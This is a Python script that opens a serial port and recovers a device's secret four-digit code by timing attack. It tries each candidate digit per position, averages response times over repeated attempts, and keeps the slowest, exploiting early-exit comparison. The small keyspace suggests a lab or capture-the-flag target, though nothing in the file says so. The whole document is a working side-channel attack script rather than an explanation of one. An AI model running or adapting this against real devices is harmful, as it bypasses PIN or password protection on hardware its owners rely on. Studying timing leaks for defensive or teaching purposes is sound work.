- import serial
- import time
-
- # Constants
- SERIAL_PORT = '/dev/ttyUSB0'
- BAUD_RATE = 9600
- PREFIX = ""
- ATTEMPTS = 3
- DELAY = 0.8
- KEYSPACE = ["1", "2", "3", "4"]
- LENGTH = 4
-
- def get_response_time(serial_port, message):
- """
- Function to send message, wait for response, and measure response time.
- """
- # Flush the input buffer to clear any leftover data
- serial_port.flushInput()
-
- first_line_received = False
-
- # Send each character in the message with a delay
- for i, char in enumerate(message):
- time.sleep(DELAY) # Delay before sending the character
- serial_port.write(char.encode()) # Send one character at a time
- #print(f"sending: {char}")
- if i < len(message)-1:
- #print(f"reading")
- raw_response = serial_port.readline()
-
- # After sending all characters, we will read until we get the first line (complete response)
- raw_response = b'' # Initialize the response variable
-
- while True:
- byte = serial_port.read(1) # Read one byte at a time
- if byte:
- if byte == b'\n' and not first_line_received:
- first_line_received = True # The first line has been received
- # Do not start timing yet; we need to wait for the next line after the first one
- elif first_line_received:
- # Start measuring response time after the first line is fully received
- start_time = time.time()
- break # We begin timing here, immediately after the first line has been read
-
- final_response = serial_port.readline().decode(errors='ignore').strip()
- # Now read the rest of the response and stop when the second newline is encountered
- #final_response = raw_response.decode(errors='ignore').strip() # Decode the response
-
- # Measure the time taken for the second line (after the first)
- response_time = time.time() - start_time
-
- # Debug message to show what was sent, received, and the response time
- print(f"\rSent: {message}, Response: {final_response}, Response Time: {response_time:.4f} seconds", end='', flush=True)
-
- time.sleep(DELAY)
- return final_response, response_time
-
- def calculate_average_response_time(serial_port, message):
- """
- Calculate average response time over multiple attempts.
- """
- total_time = 0
- response_times = []
-
- # Try multiple attempts to get the average response time
- for _ in range(ATTEMPTS):
- response, response_time = get_response_time(serial_port, message)
- total_time += response_time
- response_times.append(response_time)
-
- average_time = total_time / ATTEMPTS
- print(f"\r{message} average: {average_time:.4f} seconds ", flush=True)
- return average_time, response_times
-
- def identify_sequence(serial_port):
- """
- Identify the complete sequence of characters by sending test sequences.
- """
- prefix = ""
-
- # Loop over all positions in the sequence (length 4 in this case)
- for pos in range(LENGTH):
- slowest_avg = float('-inf') # Initialize with the smallest possible number to track the largest value
- best_digit = None
-
- # Try each character in the keyspace for this position
- for key in KEYSPACE:
- # Build message for this position
- message = prefix + key + key * (LENGTH - len(prefix) - 1)
- print(f"Testing: {message}", end='', flush=True)
-
- # Get the average response time for this message
- avg_time, _ = calculate_average_response_time(serial_port, message)
-
- # Track the slowest (highest average response time)
- if avg_time > slowest_avg: # Modify comparison to choose the longest time
- slowest_avg = avg_time
- best_digit = key
-
- # Append the best digit found to the prefix
- prefix += best_digit
- print(f"Best digit for position {pos + 1}: {best_digit} (Average response time: {slowest_avg:.4f} seconds)")
-
- return prefix
-
- def main():
- # Open the serial port
- with serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=1) as serial_port:
- print(f"Starting sequence identification on port {SERIAL_PORT}...")
- sequence = identify_sequence(serial_port)
- print(f"Identified sequence: {sequence}")
-
- if __name__ == '__main__':
- main()
-